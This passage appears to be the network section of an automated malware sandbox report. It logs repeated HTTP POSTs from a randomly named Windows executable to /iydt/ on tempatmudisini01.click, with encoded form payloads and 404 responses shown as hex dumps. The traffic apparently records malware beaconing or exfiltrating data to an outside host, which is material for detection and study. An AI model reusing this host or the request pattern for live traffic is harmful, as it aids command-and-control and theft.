                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:42 GMT
                                                                                                                                              server: LiteSpeed
                                                                                                                                              Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                                                              Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5a
                                                                                                                                              Oct 4, 2024 08:09:42.768135071 CEST1289INData Raw: fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1
                                                                                                                                              Data Ascii: AdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9h
                                                                                                                                              Oct 4, 2024 08:09:42.768177032 CEST1289INData Raw: 28 71 2d b5 f7 f6 2e b0 5c d8 59 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb
                                                                                                                                              Data Ascii: (q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hv
                                                                                                                                              Oct 4, 2024 08:09:42.768201113 CEST1289INData Raw: ca 93 fa d9 7e 4d c3 77 c8 80 9d 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f
                                                                                                                                              Data Ascii: ~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxE
                                                                                                                                              Oct 4, 2024 08:09:42.768214941 CEST1289INData Raw: e5 0f 0c e6 9d c0 8e 5d ea a1 e4 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff
                                                                                                                                              Data Ascii: ]hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>
                                                                                                                                              Oct 4, 2024 08:09:42.768228054 CEST1289INData Raw: 77 f3 46 f4 7a 9f db 34 55 2e c2 f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61
                                                                                                                                              Data Ascii: wFz4U.xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5n
                                                                                                                                              Oct 4, 2024 08:09:42.768239975 CEST1289INData Raw: bb 50 50 39 84 2d b4 72 8a 37 07 dc ca 29 df fa 62 92 52 21 00 5b 7a f7 85 d2 b2 96 90 bc d0 28 9d 58 e2 e4 85 3e f9 64 f9 95 50 04 78 c1 ab 86 6a 2a ea cf a5 31 4f 63 4b 65 de 0a 9f 65 69 73 ba d0 3c 2a 4b 97 ff 85 36 3b e6 8a a1 91 e1 21 af 0c
                                                                                                                                              Data Ascii: PP9-r7)bR![z(X>dPxj*1OcKeeis<*K6;!QCf,F;Ondd2pv9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d
                                                                                                                                              Oct 4, 2024 08:09:42.768253088 CEST1289INData Raw: 55 f5 c8 cd 97 09 cd 7b 76 1f 99 78 b5 cf a5 36 7c 14 da fe 3c fd 4c 3c 39 fd 03 22 f7 ba ea f0 7b 02 aa 69 02 8a e9 f3 29 79 5a 9c d2 49 5f 61 8e b1 24 6f 43 19 f7 1b aa 7b 15 29 15 ed 35 bf 0e d9 98 69 1c e7 5a 37 c2 d7 3e 34 5d ad 7b dd c9 4a
                                                                                                                                              Data Ascii: U{vx6|<L<9"{i)yZI_a$oC{)5iZ7>4]{J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@g
                                                                                                                                              Oct 4, 2024 08:09:42.768268108 CEST1289INData Raw: 15 09 ae 47 02 a1 d1 21 f6 0a cd ea be 21 bb 3b 87 75 80 73 45 16 04 2e 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58
                                                                                                                                              Data Ascii: G!!;usE.Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOM
                                                                                                                                              Oct 4, 2024 08:09:42.768277884 CEST440INData Raw: 71 07 72 d6 64 aa 87 c4 6c 77 99 d8 4d 26 6d a1 34 10 44 f5 ad 2d 8a ee b2 c3 10 a9 dd 6a ae 23 05 ee 07 ea 98 84 ea b2 94 a3 5f 3d 35 65 77 16 d9 45 93 f8 e4 d1 32 71 d2 71 69 f4 93 70 e0 9f a5 fd 47 ea e7 0f 2d c4 15 50 75 96 80 71 18 82 f7 86
                                                                                                                                              Data Ascii: qrdlwM&m4D-j#_=5ewE2qqipG-Puq\q1:!4L&C/wmM&Y.g@ Sh~5B-,AZlX4bAOLFuP-{M&~`/=vG[yuKAj-L2o"]=<#B|qj5?4
                                                                                                                                              Oct 4, 2024 08:09:42.770704985 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 10


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              43192.168.11.2049773103.21.221.4804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:44.927867889 CEST857OUTPOST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 41 6b 43 4b 66 4c 30 6a 52 63 57 42 49 74 45 35 2b 39 43 73 31 70 68 41 79 78 55 77 36 33 4d 77 4c 69 2b 34 39 51 35 4b 4e 72 72 50 59 5a 7a 50 4e 6a 4a 45 5a 55 6c 59 4f 42 4a 42 79 78 33 75 72 34 52 30 7a 33 34 79 43 64 6c 79 6d 50 4f 69 64 36 63 6c 38 30 32 76 52 4b 63 64 6c 76 50 50 46 63 57 5a 74 32 77 53 49 39 72 44 45 59 44 33 58 76 52 77 77 62 6a 4a 2f 35 44 5a 70 69 68 73 46 47 67 46 77 48 59 7a 4f 78 42 67 63 30 78 68 67 73 42 62 44 37 73 43 67 42 6a 69 63 35 46 51 64 33 52 62 6a 4c 31 75 56 2b 58 4c 34 38 3d
                                                                                                                                              Data Ascii: oz=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6AkCKfL0jRcWBItE5+9Cs1phAyxUw63MwLi+49Q5KNrrPYZzPNjJEZUlYOBJByx3ur4R0z34yCdlymPOid6cl802vRKcdlvPPFcWZt2wSI9rDEYD3XvRwwbjJ/5DZpihsFGgFwHYzOxBgc0xhgsBbD7sCgBjic5FQd3RbjL1uV+XL48=
                                                                                                                                              Oct 4, 2024 08:09:45.584275007 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:45 GMT
                                                                                                                                              server: LiteSpeed
                                                                                                                                              Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                                                              Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5a
                                                                                                                                              Oct 4, 2024 08:09:45.584296942 CEST1289INData Raw: fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1
                                                                                                                                              Data Ascii: AdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9h
                                                                                                                                              Oct 4, 2024 08:09:45.584336042 CEST1289INData Raw: 28 71 2d b5 f7 f6 2e b0 5c d8 59 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb
                                                                                                                                              Data Ascii: (q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hv
                                                                                                                                              Oct 4, 2024 08:09:45.584388971 CEST1289INData Raw: ca 93 fa d9 7e 4d c3 77 c8 80 9d 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f
                                                                                                                                              Data Ascii: ~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxE
                                                                                                                                              Oct 4, 2024 08:09:45.584402084 CEST1289INData Raw: e5 0f 0c e6 9d c0 8e 5d ea a1 e4 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff
                                                                                                                                              Data Ascii: ]hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>
                                                                                                                                              Oct 4, 2024 08:09:45.584481001 CEST1289INData Raw: 77 f3 46 f4 7a 9f db 34 55 2e c2 f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61
                                                                                                                                              Data Ascii: wFz4U.xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5n
                                                                                                                                              Oct 4, 2024 08:09:45.584513903 CEST1289INData Raw: bb 50 50 39 84 2d b4 72 8a 37 07 dc ca 29 df fa 62 92 52 21 00 5b 7a f7 85 d2 b2 96 90 bc d0 28 9d 58 e2 e4 85 3e f9 64 f9 95 50 04 78 c1 ab 86 6a 2a ea cf a5 31 4f 63 4b 65 de 0a 9f 65 69 73 ba d0 3c 2a 4b 97 ff 85 36 3b e6 8a a1 91 e1 21 af 0c
                                                                                                                                              Data Ascii: PP9-r7)bR![z(X>dPxj*1OcKeeis<*K6;!QCf,F;Ondd2pv9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d
                                                                                                                                              Oct 4, 2024 08:09:45.584526062 CEST1289INData Raw: 55 f5 c8 cd 97 09 cd 7b 76 1f 99 78 b5 cf a5 36 7c 14 da fe 3c fd 4c 3c 39 fd 03 22 f7 ba ea f0 7b 02 aa 69 02 8a e9 f3 29 79 5a 9c d2 49 5f 61 8e b1 24 6f 43 19 f7 1b aa 7b 15 29 15 ed 35 bf 0e d9 98 69 1c e7 5a 37 c2 d7 3e 34 5d ad 7b dd c9 4a
                                                                                                                                              Data Ascii: U{vx6|<L<9"{i)yZI_a$oC{)5iZ7>4]{J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@g
                                                                                                                                              Oct 4, 2024 08:09:45.584537029 CEST1289INData Raw: 15 09 ae 47 02 a1 d1 21 f6 0a cd ea be 21 bb 3b 87 75 80 73 45 16 04 2e 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58
                                                                                                                                              Data Ascii: G!!;usE.Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOM
                                                                                                                                              Oct 4, 2024 08:09:45.584547043 CEST440INData Raw: 71 07 72 d6 64 aa 87 c4 6c 77 99 d8 4d 26 6d a1 34 10 44 f5 ad 2d 8a ee b2 c3 10 a9 dd 6a ae 23 05 ee 07 ea 98 84 ea b2 94 a3 5f 3d 35 65 77 16 d9 45 93 f8 e4 d1 32 71 d2 71 69 f4 93 70 e0 9f a5 fd 47 ea e7 0f 2d c4 15 50 75 96 80 71 18 82 f7 86
                                                                                                                                              Data Ascii: qrdlwM&m4D-j#_=5ewE2qqipG-Puq\q1:!4L&C/wmM&Y.g@ Sh~5B-,AZlX4bAOLFuP-{M&~`/=vG[yuKAj-L2o"]=<#B|qj5?4
                                                                                                                                              Oct 4, 2024 08:09:45.585818052 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 10


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              44192.168.11.2049774103.21.221.4804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:47.788780928 CEST1289OUTPOST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 42 77 43 4b 4e 44 30 69 32 41 57 41 49 74 45 6d 4f 39 42 73 31 6f 68 41 79 70 51 77 36 7a 32 77 49 57 2b 37 66 6f 35 62 4a 33 72 59 6f 5a 7a 41 74 6a 49 4c 35 56 39 59 4f 52 4e 42 79 68 33 75 72 34 52 30 31 62 34 37 32 42 6c 77 6d 50 52 6a 64 36 51 68 38 30 61 76 51 69 71 64 6c 72 6c 50 32 6b 57 5a 4e 6d 77 55 37 5a 72 63 30 59 46 77 58 76 4a 77 77 58 56 4a 37 59 36 5a 74 6a 70 73 47 32 67 41 48 4b 53 32 50 56 46 38 74 49 79 68 43 4d 58 66 43 72 46 44 77 39 45 68 39 74 54 53 5a 7a 68 63 7a 4c 35 38 6c 65 49 53 6f 35 50 62 6c 53 43 46 63 59 64 69 6d 51 6a 34 6f 71 6e 50 44 54 77 59 4d 36 61 39 50 34 4d 4d 66 45 47 44 73 35 42 4f 5a 56 62 46 36 62 43 51 66 4b 2b 78 2f 34 4e 4c 49 5a 77 62 79 61 4b 47 76 4c 47 41 57 2f 49 69 64 43 37 59 6b 61 35 45 64 44 43 52 74 49 71 38 6b 75 52 6d 56 35 53 33 4c 36 64 50 62 6b 4b 77 38 75 69 31 48 34 61 76 58 57 61 4c 63 50 4b 65 34 32 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6BwCKND0i2AWAItEmO9Bs1ohAypQw6z2wIW+7fo5bJ3rYoZzAtjIL5V9YORNByh3ur4R01b472BlwmPRjd6Qh80avQiqdlrlP2kWZNmwU7Zrc0YFwXvJwwXVJ7Y6ZtjpsG2gAHKS2PVF8tIyhCMXfCrFDw9Eh9tTSZzhczL58leISo5PblSCFcYdimQj4oqnPDTwYM6a9P4MMfEGDs5BOZVbF6bCQfK+x/4NLIZwbyaKGvLGAW/IidC7Yka5EdDCRtIq8kuRmV5S3L6dPbkKw8ui1H4avXWaLcPKe42dxkKv7GkBS54ZZGFDmUUl8pmYnkZtvVvrzY2SQZ1D1uIVUicxmR7kf9vE4TVuVb0G7wYBPTmSv+5fSWJUxT24Jr7ip+Hi/L/uqKB/b88e17s85STL5z/11C+wWXJcegQXCHOwkdpAPZsP4wiiXc7QwNMLDHCdfdwlF/jp3LuuVETViyAx6tsrHI7DP1oIe7gPVzcNYyNjqjHEKF5s801jCWl4ottQgO9iS+MlXGluGzCd2j4ewNIGi9BQNN4xddoVEqJb5odPdtV2lV77u6DgOx9P7JllXanNJR5UI2BbduZ0CE34T6ayFsE
                                                                                                                                              Oct 4, 2024 08:09:47.788830042 CEST1289OUTData Raw: 55 34 42 6b 47 2b 34 6c 6c 33 6a 50 78 78 68 35 41 6a 79 58 76 36 75 32 67 73 38 71 63 44 30 64 4b 2b 4b 79 62 68 53 63 73 42 62 67 4d 39 79 62 6f 63 6f 6d 49 38 4f 5a 50 4a 31 43 37 55 47 2b 4f 6d 61 6b 47 70 6e 32 69 6f 44 38 34 4c 2f 74 32 68
                                                                                                                                              Data Ascii: U4BkG+4ll3jPxxh5AjyXv6u2gs8qcD0dK+KybhScsBbgM9ybocomI8OZPJ1C7UG+OmakGpn2ioD84L/t2hFivd2fUv8XRPWBSK30gcIxouf3UOTgmQDsfC8njqHiMof2ZgF1j5y2ewXej0/NKgSbhjWGQbDGtcg5sxumcpEsl/vZpjUrkf3Q3G+YMLobngY6XVclQ7kJDjx2/kPtIXH7eBIZKisXqqECyXzrzgJk0fTmICu2zqV
                                                                                                                                              Oct 4, 2024 08:09:47.788882017 CEST5428OUTData Raw: 33 56 58 76 58 62 63 63 55 6d 6d 6b 79 6a 31 30 32 66 4b 52 6c 72 77 47 45 48 4d 39 79 2f 34 59 36 66 36 4c 4e 36 73 55 6c 5a 49 79 43 4f 32 73 46 46 45 70 39 4f 67 56 4a 61 35 70 44 64 50 6e 41 61 33 76 4c 4d 61 49 36 5a 65 42 4e 4e 52 4c 38 79
                                                                                                                                              Data Ascii: 3VXvXbccUmmkyj102fKRlrwGEHM9y/4Y6f6LN6sUlZIyCO2sFFEp9OgVJa5pDdPnAa3vLMaI6ZeBNNRL8y35S+o6tzNGBIUiHeLlGqY2wZmI1LgBMuNbzUkaNgjAeHGhmMVdPgPITC0yODZutOgE/LwCOyfXEa/C1BKLBFbBnr1Vglt/j/K9CICekCDLg4k4QnZqD2lyscwS+CRNt1t+qMNCjCnvegsKOc+KIbFwLz0H7o3BPxl
                                                                                                                                              Oct 4, 2024 08:09:48.428112030 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:48 GMT
                                                                                                                                              server: LiteSpeed
                                                                                                                                              Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
